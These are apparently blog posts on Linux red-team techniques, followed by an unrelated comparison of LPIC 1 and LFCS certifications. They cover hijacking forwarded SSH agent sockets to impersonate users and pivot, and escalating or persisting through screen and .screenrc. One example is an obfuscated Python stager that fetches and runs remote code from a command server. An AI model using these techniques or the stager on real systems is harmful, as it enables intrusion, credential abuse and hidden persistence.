Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a fair amount of SSH tunneling to reach restricted systems. This is because it doesn't make sense to expose SSH to the internet, or even to your general-use internal network. Instead, there is often a bastion or jump box with SSH exposed as your initial way into the environment. Once you've connected to the bastion host, you can connect to another system within that restricted network, or even repeat the process to reach still more restricted hosts.

To handle authentication across multiple systems, users leverage SSH agents. An SSH agent is effectively a helper program that stores unencrypted identity keys and credentials in memory and exposes them to the SSH client via a Unix stream socket. The socket means the end user doesn't have to provide their credentials multiple times. The user can also ask the SSH client to retain access to the socket when connecting to another system by enabling agent forwarding with the -A flag.
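
As a quick illustration, a typical forwarding workflow looks something like the following (the key path and bastion hostname are placeholders):

eval "$(ssh-agent -s)"              # start an agent; exports SSH_AUTH_SOCK and SSH_AGENT_PID
ssh-add ~/.ssh/id_ed25519           # load a key into the agent (example key path)
ssh -A user@bastion.example.com     # -A forwards the agent socket to the bastion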

With SSH agent forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory, in a folder named ssh-<10 random characters>, with the socket itself named agent.<agent pid>. The agent folder is only accessible to the connecting user account. To see what agents are around on a given machine, you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Agent sockets are stored in /tmp, and the reference to which agent to use is controlled entirely by the value of the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can therefore point that environment variable at the socket of another connected user and effectively masquerade as them on the network. In fact, you would even have access to any of the other keys the user added to the agent. Given access to a shared system's root account, you could use commands like the following to impersonate a user and view the list of registered keys.

ls /tmp | egrep 'ssh-.{10}$' # list the agent socket directories that may be available
export SSH_AUTH_SOCK=/tmp/ssh-<random>/agent.<pid> # choose one and set it as your SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands can even be combined into a single loop like the one below. However, the ability to query and leverage the credentials depends on a live connection from the target user; stale agents can hang, because socket cleanup doesn't necessarily happen once a session is closed.

for AGENT in $(ls /tmp | egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT); echo $AGENT $(stat -c '%U' /tmp/$AGENT); timeout 10 ssh-add -l; done

Note: A lot of common programs like git, rsync, scp, etc. also allow you to leverage SSH agents. So if a given agent doesn't get you access to another system, also be sure to try using it to authenticate against common services.
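
Because these tools all read SSH_AUTH_SOCK automatically, no extra flags are needed once the variable is set. The hostnames below are placeholders for illustration:

git clone git@git.internal.example.com:team/repo.git            # git over SSH uses the hijacked agent
scp user@host.internal.example.com:/etc/passwd .                 # so does scp
rsync -e ssh user@host.internal.example.com:/var/log/ ./logs/    # and rsync over ssh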

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable, then use it to try to log into other systems or services as the targeted user. It's also worth mentioning that you may be able to combine the SSH agent with port forwarding to gain access to otherwise restricted systems; I've covered leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from, then use that IP address to try to connect back to the user's origin system. Most of the time, the user's public key is added to their own system's authorized_keys file for ease of access.
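
A minimal sketch of that workflow, with placeholder values for the agent path, user, and origin IP:

w -h                                                   # show active sessions and their source IPs
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.1234    # hijack the target's agent socket (placeholder path)
ssh targetuser@10.0.0.50                               # try their own key against their origin system (placeholder user/IP)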

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That, coupled with the fact that most users don't maintain account separation between development and production environments, makes them prime targets for SSH agent abuse.

Abusing screen and .screenrc to Escalate and Maintain Access

When it comes to playing the part of the hacker/red team in competitions like CCDC, I'm always looking for unique ways to gain and maintain access to systems. Lately I've been toying with the idea of leveraging features in common administration tools instead of exploits or misconfigurations. My favorite of these is abusing screen and .screenrc features to establish a foothold.

Why screen?

The screen command is something I think every Linux administrator uses every day. The reason is simple: it's probably the easiest way to keep your work alive or run longer jobs without the effort of creating a system service. When the screen command is issued, it effectively creates another terminal (TTY) independent of the current user's session, so if the administrator's session isn't stable or it's impractical to wait, the job won't be affected.
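
For reference, the typical workflow looks something like this (the session name is just an example):

screen -S nightly-backup    # start a named session and run the long job inside it
# detach with Ctrl-a d, log out, come back later...
screen -ls                  # list existing sessions
screen -r nightly-backup    # reattach from a brand new login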

Fun Fact: By default screens are actually allocated a TTY and spawned by the init process, not the current user. So the screen process, TTY, and child processes won't show up in user-level process listings or the standard last, w, or who command output. Instead you can use the who command with the -a (all) option to also display TTYs spawned by init.
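
Two quick ways to spot them, assuming a typical GNU/Linux userland:

who -a                                            # includes TTYs not tied to a normal login
ps -eo pid,ppid,user,tty,cmd | grep -i '[s]creen' # screen server processes reparented to init (PPID 1)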

Abusing screen and .screenrc via abandoned screens

The most common use case for the screen command is administrators running jobs that can't be interrupted, so it's always worth checking whether any screens are running when you compromise a user's account. It's not uncommon for administrators to elevate privileges or even switch users altogether within a screen. If an administrator switches to the root/superuser account in a screen, the screen still only allows the original spawning user access. If that's a lower-privilege user you've compromised, it's an easy privilege escalation.
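
A quick check from the compromised account might look like this (the session name is whatever screen -ls reports):

screen -ls               # list this user's screen sessions (Attached/Detached)
screen -d -r <session>   # force-detach it elsewhere if needed and reattach here
# if the admin left a root shell inside, you now have it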

You might be thinking the administrator should have just used sudo to elevate privileges within the screen instead of switching to the root/superuser account. It's definitely a safer option, but not a perfect one, because once a user's password is entered for a sudo command, by default it's not requested again for 15 minutes. So if you're in the right screen at the right time, or willing to wait long enough, sudo can still be used as a means of privilege escalation.

You can check whether the current user within a screen can sudo without a prompt by running sudo in non-interactive mode and seeing if it errors out.

if sudo -n true 2>/dev/null; then echo "I can sudo"; else echo "I cannot sudo"; fi

Abusing screen and .screenrc via multi-user support

The alternative laid out by the developer of the screen tool is actually a rather detailed set of permissions and multi-user support for individual screens themselves. Going over the individual permissions that are available is probably out of scope for this post. However, multi-user support is used in cases where multiple individuals need to access jobs running in a service account's screen but aren't actually allowed superuser privileges.

For instance, in my consulting days we had external nmap scanning systems, and all the consultants had access to the scans running within screens in case they needed to be modified or stopped. This allowed us to maintain access to all running jobs without requiring superuser access to switch users or elevate privileges to kill other users' processes.

To use multi-user support, make sure the SUID bit is set on the screen executable and modify the individual user's (~/.screenrc) or global (/etc/screenrc) screenrc file. For example, if you wanted to maintain access to screens created by root via a compromised standard user named tester, you could include the following in the /root/.screenrc file.

multiuser on
acladd tester
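
Assuming a setuid screen binary and a root session started with that configuration, the tester account could then attach with something like:

screen -x root/            # attach to root's (only) shared session
screen -x root/<session>   # or name the session explicitly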

If screens aren't being used often enough to leverage changes to the .screenrc file, you can also modify one of the target user's profile files to issue the screen command automatically. You can do this by adding 'screen -RR' to the user's ~/.bashrc file or the global /etc/bashrc file. This will reattach to any existing screen, or create one and attach to it, once login has completed.
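
For example, appended from a root shell (the target home directory is a placeholder):

echo 'screen -RR' >> /home/<target>/.bashrc   # auto-attach (or create) a screen at every login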

Note: For highly secure environments it's likely best to disable multi-user support in the global screenrc file. Also consider setting timestamp_timeout=0 in your global sudoers configuration, which will require a password for every use of the sudo command. Change control and/or file watchers on resource (~/.*rc) and profile files might also help.
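
A rough sketch of those hardening steps (exact paths vary by distribution, and sudoers changes are safer made through visudo):

echo 'multiuser off' >> /etc/screenrc                             # refuse multi-user screens by default
echo 'Defaults timestamp_timeout=0' >> /etc/sudoers.d/timeout     # require a password for every sudo (prefer editing via visudo)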

Abusing screen and .screenrc with stuff and clear

Maintaining Access with the stuff and clear technique

Leveraging multi-user support isn't the only way of abusing screen and .screenrc to maintain access. Instead I now utilize a technique I call stuff and clear. In this technique the target user's .screenrc file is modified to create a screen layer whenever screen is executed. This arbitrary, named layer allows the "stuff" command to send raw characters to the screen.

Luckily, the builtin printf command will handle the raw character encoding. So printf can type out the shell payload, send a return key press, type out the clear command, and send a final return key press. The stuff command then effectively recreates the same screen-clearing effect that already happens when a new screen is created. So unless the user enters copy mode and scrolls up, or errors occur, they are unlikely to notice.
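
Here's a simplified, benign sketch of the idea before the real payload below. It appends a new window and a stuffed command to the victim's .screenrc; the touched file is just a proof-of-concept marker:

echo 'screen -t "bash"' >> ~/.screenrc
printf 'stuff "touch /tmp/stuffed_poc\rclear\r"\n' >> ~/.screenrc   # printf embeds the literal carriage returns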

Here is a code segment from an Empyre module I wrote for CCDC a few years ago that does just as I described. It will write an Empyre shell to the user's .screenrc file using the stuff and clear technique.

echo 'screen -t "python"' >> ~/.screenrc && printf "stuff \""'echo \\'"\"import sys,base64;exec(base64.b64decode(\\\'bU9WakhVPSdSSVRQYURSbFFwJwppbXBvcnQgc3lzLCB1cmxsaWIyO289X19pbXBvcnRfXyh7MjondXJsbGliMicsMzondXJsbGliLnJlcXVlc3QnfVtzeXMudmVyc2lvbl9pbmZvWzBdXSxmcm9tbGlzdD1bJ2J1aWxkX29wZW5lciddKS5idWlsZF9vcGVuZXIoKTtVQT0nSDNTRTIwUVlSRlZGWTFVOCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKV07YT1vLm9wZW4oJ2h0dHA6Ly8xMC4wLjAuMTAwOjgwODAvaW5kZXguYXNwJykucmVhZCgpO2tleT0nM2ViMDMwYzZhYjA5OWIwYTM1NTcxMmZlMzhkNTlmZmInO1MsaixvdXQ9cmFuZ2UoMjU2KSwwLFtdCmZvciBpIGluIHJhbmdlKDI1Nik6CiAgICBqPShqK1NbaV0rb3JkKGtleVtpJWxlbihrZXkpXSkpJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihvcmQoY2hhcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp\\\'));"'\\'"\" | python &\rclear\r"'"' >> ~/.screenrc

Fun Fact: Screen also supports not terminating windows when the program inside them exits. This can be done by adding the 'zombie kr' line to the .screenrc file. For some payload types, this means the shell process would still be running until an administrator killed the screen manually.

One Final Thought

Since I'm the current maintainer of linuxprivchecker, I've also started making changes to help detect these opportunities for abusing screen and .screenrc for privilege escalation. I hope to continue adding features to the tool and providing related blog posts like this one. These new features will likely sit in the unstable branch for some time before they make it to master. Any assistance with testing, feedback, or ideas is always welcome.

Linux Administration Certifications: LPIC 1 and LFCS

LPIC 1 and LFCS

TLDR; The LPIC 1 and LFCS certifications can both be used to validate your skills; however, the LFCS provides a robust and uniquely hands-on testing approach.

I recently passed the LPIC 1 (Linux Professional Institute Certified System Administrator) and LFCS (Linux Foundation Certified System Administrator) certification exams, and I'm now planning to pursue the LPIC 2 and LFCE certifications this coming year. Several individuals have approached me interested in hearing more about my experiences and some of the big differences between the LPIC 1 and LFCS. I'll attempt to address those questions here and also share my opinions on their perceived value in the marketplace today.

Big Differences

The biggest differences between the LPIC 1 and LFCS certifications come down to the testing methods they each use. The LPIC 1 is a standard multiple-choice style examination with a few fill-in-the-blank questions; it consists of two exams, each with 50 knowledge-based and practical-application questions over an hour and a half. The LFCS, on the other hand, is an interactive, practical-application exam, wherein the tester is given 40 practical multi-step tasks within an actual Linux terminal and two hours to complete as many as possible.

Another major difference between the LPIC 1 and LFCS is how the testing is conducted. The two LPIC 1 exams are proctored by Pearson Vue, so they take place in your standard testing center. Since it's a standard multiple-choice exam in a standard testing center, you receive your results right after completing the exam. You are scored based on whether you select the correct answers and on the respective weight of each tested category. The LFCS is an online exam which uses a webcam, a screen share, a task portal, and a live connection to a Linux system. Throughout the exam you have terminal access to your own Linux virtual machine to complete the various tasks. The entire system is graded after completion, which delays receiving your final score, and your score is based on whether each step of the tasks, and the tasks themselves, are completed correctly. It's also rumored that points lost on one task can be recovered on others based on the methods used, cleanliness, and overall efficiency.

Difficulty Level

The difficulty level of the LPIC 1 and LFCS is heavily debated, but I think it comes down to how you study and your experience within the Linux terminal. That being said, the LPIC 1 is largely a test of base knowledge, so if you put forth the time and effort to review some of the coursework out there, you shouldn't have any problem completing the exam. I honestly don't believe experience in the Linux terminal is going to help you any more than one of the official books; the exam is all about knowing the command names and what they do. The LFCS exam, on the other hand, is largely based on whether or not you can complete a business-operations-related task in a timely manner. There is no official book for the LFCS exam, although there is online coursework which introduces you to commands and then provides lab activities to complete on your own. Having completed all of the online coursework, I believe it's likely sufficient to pass the exam. However, I think real-world Linux experience is quite a bit more useful during the LFCS exam, simply because you're being indirectly scored on timeliness and efficiency. Additionally, on top of knowing the names of commands and what they do, you also need to understand how to use each command effectively to pass the LFCS exam. Overall I would say the LFCS is going to be far more difficult for those newer to Linux, if only because of the more intimidating structure of the exam and the review of one's efficiency.

Market Value

When it comes to the market value of the LPIC 1 and LFCS certifications, I think the total value depends on your individual goals. For instance, if your goal is to get your foot in the door at a large institution, I would recommend the LPIC 1 since it has been around longer and thus has a greater chance of being recognized by a recruiter or HR. The LPIC 1 is also the better choice if your goal is to continue on and become more specialized within the Linux space. If your goal is instead to provide validation of your skills and experience to a future or current employer, I would highly recommend the LFCS. In addition to the certification being run by the Linux Foundation themselves, they now have a partnership with Microsoft. This partnership creates a great opportunity for those working within more diverse environments, by allowing candidates to take both Linux Foundation and Microsoft certifications to become specialized in mixed environments and/or the cloud. Overall I think if you're really trying to project your worth to the market, the LPIC 1 is a better bet, simply because it's been around longer and currently has more recognition than the LFCS. However, I'd bet the LFCS will soon take its place at the top, due to the growing relationships being fostered by the Linux Foundation.

Honorable Mentions

Although I have not attempted these exams, because they are distribution specific, the OCA (Oracle Certified Administrator) and the RHCSA (Red Hat Certified System Administrator) both seem to have more visibility in the marketplace. This is likely due to the huge brand recognition associated with these respective certifications. If you're already employed by an organization that mostly utilizes either of these distributions, they may provide more bang for your buck.